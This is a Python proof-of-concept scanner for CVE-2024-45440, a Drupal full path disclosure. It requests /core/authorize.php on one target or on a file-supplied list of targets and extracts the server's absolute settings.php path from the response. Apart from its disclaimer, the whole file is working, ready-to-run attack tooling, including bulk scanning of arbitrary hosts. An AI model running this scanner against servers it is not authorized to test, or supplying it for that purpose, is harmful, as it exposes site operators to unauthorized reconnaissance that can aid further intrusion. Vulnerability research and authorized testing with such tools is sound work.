POC / CVE-2024-45440.py PY
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
import re
import requests


def banners():
    """Build the start-up banner text.

    The banner is five sections separated by blank lines: a 100-character
    rule of ``=``, the CVE identifier centred to 100 columns, the advisory
    summary, the author's disclaimer, and a closing rule.

    Returns:
        str: The assembled banner; nothing is printed here.
    """
    line_len = 100
    rule = "=" * line_len
    title = "CVE-2024-45440"
    summary = (
        "Drupal 11.x-dev Full Path Disclosure Vulnerability: "
        "core/authorize.php allows Full Path Disclosure (even when error logging is None) "
        "if the value of hash_salt is file_get_contents of a file that does not exist."
    )
    notice = (
        "This tool is for educational purposes only. Any misuse of this information is the responsibility of "
        "the person utilizing this tool. The author assumes no responsibility or liability for any misuse or "
        "damage caused by this program."
    )
    # The summary is longer than line_len, so centring leaves it unpadded;
    # only the title actually gains padding.
    centred = ["{:^{w}}".format(text, w=line_len) for text in (title, summary)]
    sections = [rule, *centred, notice, rule]
    return "\n\n".join(sections)


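def scan_single_url(url=None):
    """Check one host for the CVE-2024-45440 full path disclosure.

    Requests ``/core/authorize.php`` on the target and looks for an absolute
    path ending in ``settings.php`` inside an ``<em class="placeholder">``
    element of the response body.

    Args:
        url: Host, ``host:port``, or a URL that already carries an
            ``http://`` / ``https://`` scheme. When None, the value is read
            interactively from stdin.

    Returns:
        bool: True when at least one path was extracted from the response;
        False on no match, empty input, timeout or any other request failure.
    """
    if url is None:
        print("[+] Input the IP/Domain      Example: 127.0.0.1  or  127.0.0.1:8080")
        url = input("[+] IP/Domain: ")
    url = url.strip()
    if not url:
        print("[-] Empty target, nothing to scan.")
        return False

    # Keep a scheme the caller supplied. Previously full_url was only assigned
    # for scheme-less input, so "http://host" crashed with UnboundLocalError.
    base = url if url.startswith(('http://', 'https://')) else 'http://' + url
    full_url = base.rstrip('/') + '/core/authorize.php'
    print("[*] Scanning...")

    # No explicit Host header: requests derives it from the URL, and the raw
    # input may contain a scheme, which is not a valid Host value.
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
    }
    try:
        # headers must be passed by keyword: the second positional parameter
        # of requests.get is `params`, which turned the dict into a query string.
        response = requests.get(full_url, headers=headers, timeout=10)
    except requests.exceptions.Timeout:
        # requests raises its own Timeout, which the builtin TimeoutError
        # handler never caught, so this message was unreachable before.
        print(f"[-] {url} Timeout!")
        return False
    except requests.exceptions.RequestException:
        print(f"[-] {url} Failed!")
        return False

    # The pattern only matches paths that start with "/", so a disclosure on a
    # host with drive-letter paths is not reported by this check.
    pattern = r'<em class="placeholder">(/.*?settings\.php)'
    # dict.fromkeys drops repeated paths while keeping first-seen order.
    paths = list(dict.fromkeys(re.findall(pattern, response.text)))
    if not paths:
        # A page that merely mentions settings.php is not evidence of the
        # disclosure; only an extracted path counts as a hit.
        print(f"[-] {url} Not Exist!")
        return False

    print(f"[+] {url} Existed!")
    for path in paths:
        print("[+] The full path is:", path)
    return True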

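def scan_multiple_urls():
    """Scan every target listed in a text file and print the ones that hit.

    Prompts for the path of a UTF-8 text file holding one target per line,
    passes each non-blank line to ``scan_single_url`` and finally lists the
    targets for which that call returned a truthy result.

    Returns:
        None. Results are printed; an unreadable file ends the run early.
    """
    print("[+] Input the path of txt        Example: ./url.txt  or  C:\\the\\path\\to\\url.txt")
    url_path = input("[+] Path: ")
    try:
        with open(url_path, 'r', encoding='utf-8') as f:
            # Blank lines used to be scanned as an empty host; skip them.
            url_list = [entry for entry in (line.strip() for line in f) if entry]
    except FileNotFoundError:
        print("[-] File Not Found!")
        return
    except (OSError, UnicodeDecodeError) as err:
        # Covers a directory path, missing read permission, or a file that
        # is not valid UTF-8; none of these should end in a traceback.
        print(f"[-] Could not read {url_path}: {err}")
        return

    result_list = []
    for url in url_list:
        if scan_single_url(url):
            result_list.append(url)

    print("[+] Successful Target:")
    for result in result_list:
        print(f"[+] {result}")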


def main():
    """Show the banner and menu, then run the scan mode the user selects.

    Reads one line from stdin: ``1`` runs the single-target scan, ``2`` runs
    the file-driven scan, anything else prints an error and returns.
    """
    print(banners())
    print("[1] Scan single url\n[2] Scan multiple urls")
    # Menu key -> handler; both handlers are called without arguments.
    actions = {
        '1': scan_single_url,
        '2': scan_multiple_urls,
    }
    selected = actions.get(input("[+] Choose: "))
    if selected is None:
        print("[-] Invalid option selected!")
        return
    selected()


# Start the interactive menu only when the file is executed as a script,
# so importing the module does not prompt for input.
if __name__ == '__main__':
    main()